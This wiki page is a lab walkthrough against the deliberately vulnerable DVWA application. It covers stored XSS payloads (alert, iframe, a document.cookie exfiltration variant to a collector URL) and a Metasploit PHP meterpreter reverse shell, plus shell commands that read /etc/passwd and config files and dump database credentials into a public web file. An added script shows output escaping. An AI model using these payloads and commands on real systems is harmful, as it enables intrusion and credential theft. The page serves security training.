Difference between revisions of "DVWA: XSS"

From OnnoWiki
Revision as of 09:30, 28 May 2017

Source: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html

Objectives

  • Test a basic cross site scripting (XSS) attack
  • Test an iframe cross site scripting (XSS) attack
  • Test a cookie cross site scripting (XSS) attack
  • Create a php/meterpreter/reverse_tcp payload
  • Start the php/meterpreter/reverse_tcp listener
  • Upload the PHP payload to the DVWA Upload screen
  • Test a PHP Payload cross site scripting (XSS) attack


On the DVWA side

Check the IP address of the DVWA host

ifconfig

Note this address; it is the one that appears as 192.168.1.106 in the payloads and URLs below.


Fix Stored Cross Site Scripting (XSS) Comment Box

The Message textarea of the stored XSS page limits input to 50 characters, which is too short for some of the payloads used below. Raise the limit by editing index.php (the path depends on where DVWA is installed; the commands later on this page use /var/www/html/dvwa).

cd /var/www/html/DVWA-1.9/vulnerabilities/xss_s/
vi index.php

Search for the keyword mtxMessage and change maxlength=50

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea>

to maxlength=250

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"250\"></textarea>

maxlength is enforced only by the browser; it is a convenience for this lab, not a security control. An attacker can send the POST request directly with any message length, so the server must not rely on it.

On the Kali Linux side

Check the IP address of Kali Linux

ifconfig -a

Enable JavaScript in the browser

Open Firefox
Preferences > Content > Uncheck "Block pop-up windows"

JavaScript must be enabled and pop-ups allowed, otherwise the alert() and window.location payloads below will not run.

Log in to DVWA

  • Login
  • DVWA Security > Low

XSS Stored Basic Exploit Test

  • Click > XSS (Stored)
  • In Name enter "Test 1"
  • In Message enter "<script>alert("This is an XSS Exploit Test")</script>"
  • Click > Sign Guestbook

The alert appears because the message is saved in the database and echoed back into the page without encoding. Unlike reflected XSS, the script now runs in the browser of every user who views the guestbook, not only the one who submitted it.

XSS Stored IFRAME Exploit Test

  • Reset the DVWA database (Setup / Reset DB) so that the XSS entries from the previous test no longer appear.
  • Click > XSS (Stored)
  • In Name enter "Test 2"
  • In Message enter "<iframe src="http://www.cnn.com"></iframe>"
  • Click > Sign Guestbook

CNN now appears below "Test 2".

If the framed site sends an X-Frame-Options header or a Content-Security-Policy frame-ancestors directive, the browser will refuse to render it inside the iframe; in that case point the iframe at a site that permits framing, or at a page on your own lab host.

       This is a powerful exploit because an attacker could use SET to create a malicious cloned website and embed it here.
           e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images

XSS Stored COOKIE Exploit Test

  • Reset the DVWA database so that the XSS entries from the previous test no longer appear.
  • Click > XSS (Stored)
  • In Name enter "Test 3"
  • In Message enter "<script>alert(document.cookie)</script>"
  • Click > Sign Guestbook


   The alert shows the cookie/session that the web server established with the current browser session.
   An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
   Imagine if this were a bank website: every time a user logged in, their cookie information could be sent to a remote location.

   Note that document.cookie only exposes cookies that are not flagged HttpOnly. A session cookie set with HttpOnly would not be visible to the script, which is why that flag is part of the standard defence even though it does not stop the XSS itself.
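As an added example (not DVWA's code and not part of the original lesson), the Node.js script below models the guestbook as DVWA renders it at the Low level (name and message concatenated into the HTML unchanged) beside an escaped render equivalent to PHP's htmlspecialchars, and runs a simple classifier over a constructed set of stored rows: the four messages posted in this lesson (Test 1 to Test 4, including the window.location payload used later on this page) plus the cookie-exfiltration variant this section warns about. The collector URL http://192.168.1.105/steal, the row contents and the regular expressions are assumptions made for the example.

```javascript
// Added example, not DVWA code: model of the DVWA stored-XSS guestbook
// (vulnerabilities/xss_s) at the Low level versus an escaped render, plus a
// classifier for the stored payloads used in this lesson.

// Equivalent of PHP htmlspecialchars($s, ENT_QUOTES): the five characters that
// can start or end markup become entities, so the browser treats them as text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Low level: name and message are concatenated into the HTML exactly as stored.
function renderLow(row) {
  return `<div id="guestbook_comments">Name: ${row.name}<br />` +
    `Message: ${row.message}<br /></div>`;
}

// Hardened render: the same layout, but both user-controlled fields are encoded.
function renderSafe(row) {
  return `<div id="guestbook_comments">Name: ${escapeHtml(row.name)}<br />` +
    `Message: ${escapeHtml(row.message)}<br /></div>`;
}

// Crude check on the rendered HTML: is there still a raw tag, inline event
// handler or javascript: URL that the browser would execute?
const ACTIVE_CONTENT = /<\s*(script|iframe|img|svg|object|embed)\b|\son\w+\s*=|javascript:/i;
function containsActiveContent(html) {
  return ACTIVE_CONTENT.test(html);
}

// Signatures for the payloads seen in this lesson (assumed patterns, not an
// exhaustive XSS detector): what to look for in the guestbook table.
const PAYLOAD_SIGNS = [
  { tag: "script-tag",    re: /<\s*script\b/i },
  { tag: "iframe",        re: /<\s*iframe\b/i },
  { tag: "cookie-access", re: /document\.cookie/i },
  { tag: "redirect",      re: /window\.location|location\.href/i },
  { tag: "exfil",         re: /\b(fetch|XMLHttpRequest|new\s+Image)\b/i },
];
function classify(message) {
  return PAYLOAD_SIGNS.filter((p) => p.re.test(message)).map((p) => p.tag);
}

// Constructed sample rows: a benign entry, the four messages posted in this
// lesson, and the exfiltration variant the cookie test warns about. The
// collector URL is an assumed placeholder for the attacker's host.
const COLLECTOR = "http://192.168.1.105/steal";
const SAMPLE_ROWS = [
  { name: "Alice",   message: "Nice guestbook, thanks!" },
  { name: "Test 1",  message: '<script>alert("This is an XSS Exploit Test")</script>' },
  { name: "Test 2",  message: '<iframe src="http://www.cnn.com"></iframe>' },
  { name: "Test 3",  message: "<script>alert(document.cookie)</script>" },
  { name: "Test 4",  message: '<script>window.location="http://192.168.1.106/dvwa/hackable/uploads/FORUM_BUG.php" </script>' },
  { name: "Test 3b", message: `<script>new Image().src="${COLLECTOR}?c=" + encodeURIComponent(document.cookie)</script>` },
];

// For each stored row: which payload patterns it matches, and whether each
// render would still hand the browser something executable.
function audit(rows) {
  return rows.map((row) => ({
    name: row.name,
    tags: classify(row.message),
    lowIsActive: containsActiveContent(renderLow(row)),
    safeIsActive: containsActiveContent(renderSafe(row)),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const result of audit(SAMPLE_ROWS)) {
    console.log(JSON.stringify(result));
  }
}
```

Run it with node: each row is printed with the payload patterns it matched and whether the Low and the escaped render still contain active content. The same five rows that execute under the Low render come out inert under the escaped render, which is the fix DVWA applies at its higher security levels; the classifier is the kind of check you would run over the guestbook table, or over the request bodies in the web server log, to find stored payloads after the fact.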


Build PHP msfpayload

   mkdir -p /root/backdoor
   cd /root/backdoor
   msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php
   ls -l FORUM_BUG.php

   LHOST is the Kali Linux address obtained with ifconfig -a above; R tells msfpayload to write the raw payload. msfpayload has been removed from current Metasploit releases; the equivalent command is
   msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 -f raw > FORUM_BUG.php


   Select "Upload" from the left navigation menu.
   Click Browse, choose FORUM_BUG.php and upload it.

   DVWA stores uploaded files under hackable/uploads/ on the DVWA host, which is the path requested by the payload in the next test. The chain only works because the upload page accepts a .php file and the web server executes PHP from that directory.

Start msfconsole

   msfconsole

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.105
set LPORT 4444
exploit

LHOST and LPORT must match the values compiled into FORUM_BUG.php; the handler now waits for the connection back from the DVWA host.


XSS Stored window.location Exploit Test

  • Reset the DVWA database so that the XSS entries from the previous test no longer appear.
  • Click > XSS (Stored)

Name: Test 4
Message:

   <script>window.location="http://192.168.1.106/dvwa/hackable/uploads/FORUM_BUG.php" </script>
       Replace 192.168.1.106 with the IP address of the DVWA host obtained with ifconfig above (the original lesson takes it from its Fedora 14 machine, Section 3, Step 3).

Click Sign Guestbook
Click OK when the Test 1 alert is displayed

Any browser that loads the guestbook is now redirected to FORUM_BUG.php. The web server executes the PHP payload when the file is requested, so it is the DVWA host, not the visitor, that connects back to the handler on Kali, and a meterpreter session opens in msfconsole. From here on the commands are typed into that session.

shell

   Drops from meterpreter into an "sh" shell on the DVWA host; the commands that follow run as the web server's user.

tail /etc/passwd

   This produces a potential prospect list for an ssh brute force attack.
   whoami
       Displays the name of the user the web server runs as.
   grep apache /etc/passwd
       The goal of this command is obtaining the home directory for the apache username.
   find /var/www/* -print | grep config
       This finds all the configuration files under the /var/www directory.


   grep "db_" /var/www/html/dvwa/config/config.inc.php
       This produces the database name, username, and password needed to log into the mysql database.
   echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
       This command produces a table list of the dvwa database. dvwaPASSWORD stands for the db_password value read from config.inc.php; there is no space between -p and the password.
   echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
       This command describes the columns of the users table in the dvwa database.
   echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
       This command displays the user and password information for each user in the dvwa.users table.


   echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
       Place the html <pre> tag in the xss.html file.
       The <pre> tag preserves the formatting of the query output.
   echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
       Place the user and password columns of the dvwa.users table in the xss.html file.
   echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
       Place the closing html </pre> tag in the xss.html file.
   echo "<br>Your Name<br>" >> /var/www/html/dvwa/hackable/uploads/xss.html
       Replace the string "Your Name" with your actual name.
   date >> /var/www/html/dvwa/hackable/uploads/xss.html

   xss.html is written into the same uploads directory the web server serves, so the dumped credentials are now readable from any browser.



   On Kali Linux (BackTrack in the original lesson), open the URI below in Firefox
       http://192.168.1.106/dvwa/hackable/uploads/xss.html
           Replace the above IP address with the IP address of the DVWA host obtained with ifconfig above.

References

  • http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html